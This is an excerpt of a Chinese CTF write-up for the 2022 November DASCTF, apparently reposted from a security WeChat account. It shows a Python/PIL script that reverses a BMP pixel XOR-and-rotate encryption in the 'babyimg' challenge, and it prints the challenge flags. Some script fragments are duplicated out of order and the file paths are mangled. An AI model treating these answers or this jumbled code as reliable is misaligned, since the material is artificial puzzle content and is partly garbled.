解码HuffmanDecoding(s);}}return 0;
flag即为:
cuhayhcymcdhyayhucyhmahauhaa
4
babyimg
lg = cip.load()for i in range(360):for j in range(360):flg[i,j] = f2_pix[i * 360 + j] # 其实这种处理方法不很规整,bmp的像素不止3字节,还有一个保留位 =># typedef struct tagRGBQUAD# {# BYTE rgbBlue; /*指定蓝色分量*/# BYTE rgbGreen; /*指定绿色分量*/# BYTE rgbRed; /*指定红色分量*/# BYTE rgbReserved; /*保留,指定为0*/# } RGBQUAD;cip.save(r"C:UsersAdministratorDesktopDasctf11月赛re1babyimgflagggg.bmp")cip.show()
这道题,比赛的时候看了好久没看明白,赛后复盘的时候才发现它在操作.bmp图片,misc题。
对照结构体,我没可以很清晰的进行变量重命名
程序主要对图片的像素进行了操作:
首先是像素的异或
exp如下:
ps : python 有一个库是专门处理图片的,我现学了一下,不太熟练,代码写的可能比较丑陋,望见谅。
from PIL import Imagecip = Image.open(r"C:UsersAdministratorDesktopDasctf11月赛re1babyimgflag.enc.bmp")width = 360height = 360cip_pix = [[0 for i in range(360)] for j in range(360)]f1_pix = [[0 for i in range(360)] for j in range(360)]f2_pix = []fin_pix = []for i in range(height):for j in range(width):cip_pix[i][j] = (cip.getpixel((i,j)))for i in range(360):for j in range(360):f1_pix[i][j] = cip_pix[j][360-i-1]for i in range(360):for j in range(360):f2_pix.append(f1_pix[i][j])for i in range(len(f2_pix)-1,0,-1):t1 = (f2_pix[i])[0] ^ (f2_pix[i-1])[0]t2 = (f2_pix[i])[1] ^ (f2_pix[i-1])[1]t3 = (f2_pix[i])[2] ^ (f2_pix[i-1])[2]f2_pix[i] = (t1,t2,t3)t1 = (f2_pix[0])[0] ^ 0xFEt2 = (f2_pix[0])[1] ^ 0xDCt3 = (f2_pix[0])[2] ^ 0xBAf2_pix[0] = (t1,t2,t3)for i in range(len(f2_pix)):t0 = (f2_pix[i])[0]t1 = (f2_pix[i])[1]t2 = (f2_pix[i])[2]f2_pix[i] = (t2,t0,t1)flg = cip.load()for i in range(360):for j in range(360):flg[i,j] = f2_pix[i * 360 + j] # 其实这种处理方法不很规整,bmp的像素不止3字节,还有一个保留位 =># typedef struct tagRGBQUAD# {# BYTE rgbBlue; /*指定蓝色分量*/# BYTE rgbGreen; /*指定绿色分量*/# BYTE rgbRed; /*指定红色分量*/# BYTE rgbReserved; /*保留,指定为0*/# } RGBQUAD;# 按理说我们应该添加上,但不添加也能正常显示cip.save(r"C:UsersAdministratorDesktopDasctf11月赛re1babyimgflagggg.bmp")cip.show()
flag即为:
6r347_y0u_607_7h3_r16h7_fl46_bmp
EDI安全
扫二维码|关注我们
一个专注渗透实战经验分享的公众号
原文始发于微信公众号(EDI安全):2022十一月DASCTF-WriteUp By EDISEC
